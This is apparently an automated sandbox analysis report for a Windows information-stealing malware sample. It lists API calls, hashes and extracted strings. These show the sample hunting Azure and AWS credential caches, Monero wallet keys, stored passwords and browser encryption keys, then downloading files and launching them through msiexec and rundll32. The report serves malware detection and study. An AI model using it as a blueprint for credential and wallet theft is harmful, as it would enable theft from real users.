                          • Part of subcall function 00274910: lstrcat.KERNEL32(?,?), ref: 00274A70
                          • Part of subcall function 00274910: lstrcat.KERNEL32(?,00280FFC), ref: 00274A82
                          • Part of subcall function 00274910: lstrcat.KERNEL32(?,?), ref: 00274A96
                          • Part of subcall function 00274910: CopyFileA.KERNEL32(?,?,00000001), ref: 00274AAC
                          • Part of subcall function 00274910: DeleteFileA.KERNEL32(?), ref: 00274B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 9a0b44be5077e9c8c1a74e773a775fbe2049226bf87315db93d7885c50fd3247
                        • Instruction ID: 78c38a16050306243e005edd545a6b33bb5ba9ca91f59be1ba1aa1b76d7fdb9a
                        • Opcode Fuzzy Hash: 9a0b44be5077e9c8c1a74e773a775fbe2049226bf87315db93d7885c50fd3247
                        • Instruction Fuzzy Hash: 2141B3BA96020866C754F770DC47FED7638AB65700F0084A4B689660C1EEB46BF98B93
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0027906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 4309eb041b58246bbac41ad7dcc3acab908fc73593ec17f0e10def634b0ff5a9
                        • Instruction ID: addd97084c62a2a254382f0c56c00686e6fffa660085e1eaace97c07ffc5e628
                        • Opcode Fuzzy Hash: 4309eb041b58246bbac41ad7dcc3acab908fc73593ec17f0e10def634b0ff5a9
                        • Instruction Fuzzy Hash: 07711CB5910208ABDB04EFE4DC89FEEBBB8BF48700F108518F516A7290DB74A954CF65
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 002731C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 0027335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 002734EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 87b11f1f60800528792c498ffa24e5a1e3f6f79ad9e96cbfa7a21502640d045e
                        • Instruction ID: a74d17646fe323b528c337f976c5d7e88ad9a7535d459a6b048f6ff1da01a2fd
                        • Opcode Fuzzy Hash: 87b11f1f60800528792c498ffa24e5a1e3f6f79ad9e96cbfa7a21502640d045e
                        • Instruction Fuzzy Hash: E6122171820108DADB19FBA0CC92FEEB738AF54310F508169F51B66191EF742B6ACF56
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 00266280: InternetOpenA.WININET(00280DFE,00000001,00000000,00000000,00000000), ref: 002662E1
                          • Part of subcall function 00266280: StrCmpCA.SHLWAPI(?,00E2EA78), ref: 00266303
                          • Part of subcall function 00266280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00266335
                          • Part of subcall function 00266280: HttpOpenRequestA.WININET(00000000,GET,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00266385
                          • Part of subcall function 00266280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002663BF
                          • Part of subcall function 00266280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002663D1
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00275318
                        • lstrlen.KERNEL32(00000000), ref: 0027532F
                          • Part of subcall function 00278E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00278E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00275364
                        • lstrlen.KERNEL32(00000000), ref: 00275383
                        • lstrlen.KERNEL32(00000000), ref: 002753AE
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: b623ec4e8c720a99d56c4b44151442e8065f0842cfebd46af40cc0c8677e652c
                        • Instruction ID: 027ceb448076e15f7c0a5f252887f9437db1349ac20531d0e2d721b56233bd61
                        • Opcode Fuzzy Hash: b623ec4e8c720a99d56c4b44151442e8065f0842cfebd46af40cc0c8677e652c
                        • Instruction Fuzzy Hash: 8E51FD309301489BCB18FF60CD96AEE7779AF90311F508128F81E5A591EF746B66CF62
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00264839
                          • Part of subcall function 002647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00264849
                        • InternetOpenA.WININET(00280DF7,00000001,00000000,00000000,00000000), ref: 0026610F
                        • StrCmpCA.SHLWAPI(?,00E2EA78), ref: 00266147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0026618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002661B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 002661DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0026620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00266249
                        • InternetCloseHandle.WININET(?), ref: 00266253
                        • InternetCloseHandle.WININET(00000000), ref: 00266260
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID: x
                        • API String ID: 2507841554-2890206012
                        • Opcode ID: 7f853a4ea06e023a12b822a1156f1322ed8cf2a8e5123276eef8cdf1ce0c861e
                        • Instruction ID: 6341d530ebe21f8e0b3e86a35f38f6b86e457d044b6908c804ddb71067f99073
                        • Opcode Fuzzy Hash: 7f853a4ea06e023a12b822a1156f1322ed8cf2a8e5123276eef8cdf1ce0c861e
                        • Instruction Fuzzy Hash: 9D5194B1920218ABDF20DF50DC59BEE7778FB44701F1080A8B609A71C0DB74AAD5CF95
                        APIs
                          • Part of subcall function 00278DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00278E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 002742EC
                        • lstrcat.KERNEL32(?,00E2E4D8), ref: 0027430B
                        • lstrcat.KERNEL32(?,?), ref: 0027431F
                        • lstrcat.KERNEL32(?,00E2D480), ref: 00274333
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 00278D90: GetFileAttributesA.KERNEL32(00000000,?,00261B54,?,?,0028564C,?,?,00280E1F), ref: 00278D9F
                          • Part of subcall function 00269CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00269D39
                          • Part of subcall function 002699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                          • Part of subcall function 002699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                          • Part of subcall function 002699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                          • Part of subcall function 002699C0: ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                          • Part of subcall function 002699C0: LocalFree.KERNEL32(0026148F), ref: 00269A90
                          • Part of subcall function 002699C0: CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                          • Part of subcall function 002793C0: GlobalAlloc.KERNEL32(00000000,002743DD,002743DD), ref: 002793D3
                        • StrStrA.SHLWAPI(?,00E2E3B8), ref: 002743F3
                        • GlobalFree.KERNEL32(?), ref: 00274512
                          • Part of subcall function 00269AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269AEF
                          • Part of subcall function 00269AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00264EEE,00000000,?), ref: 00269B01
                          • Part of subcall function 00269AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269B2A
                          • Part of subcall function 00269AC0: LocalFree.KERNEL32(?,?,?,?,00264EEE,00000000,?), ref: 00269B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 002744A3
                        • StrCmpCA.SHLWAPI(?,002808D1), ref: 002744C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 002744D2
                        • lstrcat.KERNEL32(00000000,?), ref: 002744E5
                        • lstrcat.KERNEL32(00000000,00280FB8), ref: 002744F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: e756b9e9831fa58f3de83f9a717a5693f33292bf24bffe9ff7440bdd7313bd5f
                        • Instruction ID: d8a3881a1117af263a745c1a3271d586d52758196d37101a12ec48f34abf70ef
                        • Opcode Fuzzy Hash: e756b9e9831fa58f3de83f9a717a5693f33292bf24bffe9ff7440bdd7313bd5f
                        • Instruction Fuzzy Hash: 957136B6910208ABDB54FBB0DC89FEE7779AB88300F048598F60997181DB34DB65CF91
                        APIs
                          • Part of subcall function 002612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002612B4
                          • Part of subcall function 002612A0: RtlAllocateHeap.NTDLL(00000000), ref: 002612BB
                          • Part of subcall function 002612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002612D7
                          • Part of subcall function 002612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002612F5
                          • Part of subcall function 002612A0: RegCloseKey.ADVAPI32(?), ref: 002612FF
                        • lstrcat.KERNEL32(?,00000000), ref: 0026134F
                        • lstrlen.KERNEL32(?), ref: 0026135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00261377
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 00278B60: GetSystemTime.KERNEL32(00280E1A,00E2A610,002805AE,?,?,002613F9,?,0000001A,00280E1A,00000000,?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 00278B86
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00261465
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                          • Part of subcall function 002699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                          • Part of subcall function 002699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                          • Part of subcall function 002699C0: ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                          • Part of subcall function 002699C0: LocalFree.KERNEL32(0026148F), ref: 00269A90
                          • Part of subcall function 002699C0: CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 002614EF
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: e660309f0a34ffe88488f41217bb42db767a7659b8b7643a3f60e4c0fb46a390
                        • Instruction ID: 4947e30857f85cf634c72f490152df0e964665f90dae4c88f90526d007b02a77
                        • Opcode Fuzzy Hash: e660309f0a34ffe88488f41217bb42db767a7659b8b7643a3f60e4c0fb46a390
                        • Instruction Fuzzy Hash: 215125B1D6011997CB55FB60DD92FEE733C9B54310F4041A8B60E62091EF706BA9CFA6
                        APIs
                          • Part of subcall function 002672D0: memset.MSVCRT ref: 00267314
                          • Part of subcall function 002672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0026733A
                          • Part of subcall function 002672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002673B1
                          • Part of subcall function 002672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0026740D
                          • Part of subcall function 002672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00267452
                          • Part of subcall function 002672D0: HeapFree.KERNEL32(00000000), ref: 00267459
                        • lstrcat.KERNEL32(00000000,002817FC), ref: 00267606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00267648
                        • lstrcat.KERNEL32(00000000, : ), ref: 0026765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0026768F
                        • lstrcat.KERNEL32(00000000,00281804), ref: 002676A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 002676D3
                        • lstrcat.KERNEL32(00000000,00281808), ref: 002676ED
                        • task.LIBCPMTD ref: 002676FB
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: :
                        • API String ID: 3191641157-3653984579
                        • Opcode ID: 2f2d4dd34dfa045a28c5317549d6098ab9a569669b3c27926479033cf7f63374
                        • Instruction ID: 467d47747d491866b9906774f6d3a2fa2fef1091184902207ac117b82f4f4df8
                        • Opcode Fuzzy Hash: 2f2d4dd34dfa045a28c5317549d6098ab9a569669b3c27926479033cf7f63374
                        • Instruction Fuzzy Hash: 7B317EB1920109DFCB08FBB4DC95DFE7B79BB46301B184128F102A7290DB34A9A2CF56
                        APIs
                        • memset.MSVCRT ref: 00267314
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0026733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002673B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0026740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00267452
                        • HeapFree.KERNEL32(00000000), ref: 00267459
                        • task.LIBCPMTD ref: 00267555
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: Password
                        • API String ID: 2808661185-3434357891
                        • Opcode ID: 95ab31869af982055b0fd76e7a1230d4cd9312d9fdee793188482a122bb1bad2
                        • Instruction ID: 4186c0fd0bcf0529f1c55350080c79e534f20bf3cc5d88bcfa75d09e4671523e
                        • Opcode Fuzzy Hash: 95ab31869af982055b0fd76e7a1230d4cd9312d9fdee793188482a122bb1bad2
                        • Instruction Fuzzy Hash: FD616CB58241289BDB24DF50DC55BDAB7B8BF44304F0081E9E689A6181DFB05FD9CFA0
                        APIs
                        • memset.MSVCRT ref: 002740D5
                        • RegOpenKeyExA.ADVAPI32(80000001,00E2DB30,00000000,00020119,?), ref: 002740F4
                        • RegQueryValueExA.ADVAPI32(?,00E2E400,00000000,00000000,00000000,000000FF), ref: 00274118
                        • RegCloseKey.ADVAPI32(?), ref: 00274122
                        • lstrcat.KERNEL32(?,00000000), ref: 00274147
                        • lstrcat.KERNEL32(?,00E2E3D0), ref: 0027415B
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID: H$`
                        • API String ID: 2623679115-2340876159
                        • Opcode ID: 0ea1e9503e3839d26363faac9a9586cf9770eb5766a27d8ff477e233f67b5a6c
                        • Instruction ID: 6f5baab739ba7292ebb16de08f183f98cf74054afd9e129edd0f8dba6551aee7
                        • Opcode Fuzzy Hash: 0ea1e9503e3839d26363faac9a9586cf9770eb5766a27d8ff477e233f67b5a6c
                        • Instruction Fuzzy Hash: 7B41DBB6D101086BDB14FBB0DC46FFE773DAB88300F448958B61A56181EB755BA8CF92
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E2E1A8,00000000,?,00280E2C,00000000,?,00000000), ref: 00278130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00278137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00278158
                        • __aulldiv.LIBCMT ref: 00278172
                        • __aulldiv.LIBCMT ref: 00278180
                        • wsprintfA.USER32 ref: 002781AC
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: eeafde79b777ad907ae25aecc822df510fe5782ffad60eec11f10a5937bf89b0
                        • Instruction ID: e7161f2cc38f5a3da18c565a74d43238e3783a3fd84f3e1944ab9179b9382341
                        • Opcode Fuzzy Hash: eeafde79b777ad907ae25aecc822df510fe5782ffad60eec11f10a5937bf89b0
                        • Instruction Fuzzy Hash: 1E2121B1D54218ABDB00DFD4CC49FAFBB78FB45B14F108519F609BB280D77859118BA5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002776A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 002776AB
                        • RegOpenKeyExA.ADVAPI32(80000002,00E1C350,00000000,00020119,00000000), ref: 002776DD
                        • RegQueryValueExA.ADVAPI32(00000000,00E2E178,00000000,00000000,?,000000FF), ref: 002776FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 00277708
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11$x
                        • API String ID: 3225020163-3944839559
                        • Opcode ID: 7e1388da3682dd511c334bfe86338c0a606b86e23451eb7498d38a7ef314748d
                        • Instruction ID: 9844727ef96c7efbfca6eb665d90eacac85a8c4b13f44c8878353070e98760ad
                        • Opcode Fuzzy Hash: 7e1388da3682dd511c334bfe86338c0a606b86e23451eb7498d38a7ef314748d
                        • Instruction Fuzzy Hash: 8F014FB9A14205BBDB00EBE4DC49FAEBBB8EB49701F108468FA0597290D7B49924CB55
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                        • lstrlen.KERNEL32(00000000), ref: 0026BC9F
                          • Part of subcall function 00278E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00278E52
